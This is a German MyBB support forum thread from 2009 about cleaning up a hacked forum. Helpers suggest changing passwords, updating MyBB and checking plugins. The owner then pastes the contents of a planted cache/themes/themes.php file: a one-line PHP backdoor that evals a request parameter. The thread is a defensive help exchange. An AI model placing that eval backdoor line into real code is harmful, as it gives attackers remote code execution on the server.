MyBB.de Forum

Normale Version: [Problem] Backdoor Trojaner.
Du siehst gerade eine vereinfachte Darstellung unserer Inhalte. Normale Ansicht mit richtiger Formatierung.
Seiten: 1 2
Hi,

laut einer unbekannten Quelle, besitze ich auf meinem Forum einen Backdoor Trojaner.

Nun ist meine Frage, wie kann man Diesen entfernen ?
Hi,
da fehlen ein paar Infos. Wer ist die Quelle? Wenn sie unbekannt ist, woher weißt du es dann?
(02.08.2009, 21:20)querschlaeger schrieb: [ -> ]Hi,
da fehlen ein paar Infos. Wer ist die Quelle? Wenn sie unbekannt ist, woher weißt du es dann?

Das Forum laggt extrem und die Quelle meinte, es wäre ein Backdoor Trojaner.
Wenn wir diesen nicht demnächst entfernen würden, wäre das Forum bald offline.
Hört alles viel zu nebulös an...

Aber wenn du auf Nummer Sicher gehen willst: Ändere alle Passwörter (FTP, SQL, Passwörter der Admins und notfalls noch das Passwort des CP von deinem Provider) - kann nie schaden. Stelle außerdem sicher, dass sich dein MyBB auf der aktuellsten Version befindet bzw. vergleiche die MyBB-Dateien mit denen aus dem offiziellen Paket. Überprüfe auch mal ob die langsame Geschwindigkeit nicht evtl. durch ein Plugin verursacht wird (bei der Gelegenheit auch mal die Plugins auf neuere Versionen prüfene - geht ja einfach im Admin CP).

Ansonsten: Frag deine Quelle mal, wie sie zu so einer Aussage kommt.
Da du von Backdoor sprichst, evtl. das hier: http://community.mybboard.net/thread-52474.html
Hallo,

ich hole diesen Thread noch einmal hoch,

in dem Link steht

Zitat:Look in your ./cache/themes/ folder, if you see a files called themes.php, please delete it.
Quelle

Ich habe gerade in meinem Forum geschaut (wir wurden gehackt) und ich habe eine solche Datei.
Allerdings nicht in /themes/folder sondern in /themes

gehört die dennoch gelöscht oder ist die dort richtig?

Wahrscheinlich gehört sie dort hin, oder?!
Sie ist vor einem Jahr das letzte mal bearbeitet worden, laut Angaben

Aber mir fehlt dann die /themes/folder die habe ich nicht dort als Unterordner
Was steht denn da drin?
hier das steht drinne:

Code:
<?PHP if (isset($_REQUEST[x])) eval(stripslashes($_REQUEST[x])); ?>
Die Datei muss weg, die ist gefährlich.
ok, dann werde ich die mal löschen

Danke Smile
um die index-Dateien, also index.php und index.html alle wieder herzustellen, muß ich das alles per hand von einem Backup machen oder kann ich das auch per Upgrade?

Ein Upgrade würde mir dann allerdings wahrscheinlich eine solche Datei, wie eben gelöscht, nicht löschen oder?

wie erkenne ich diese?
Seiten: 1 2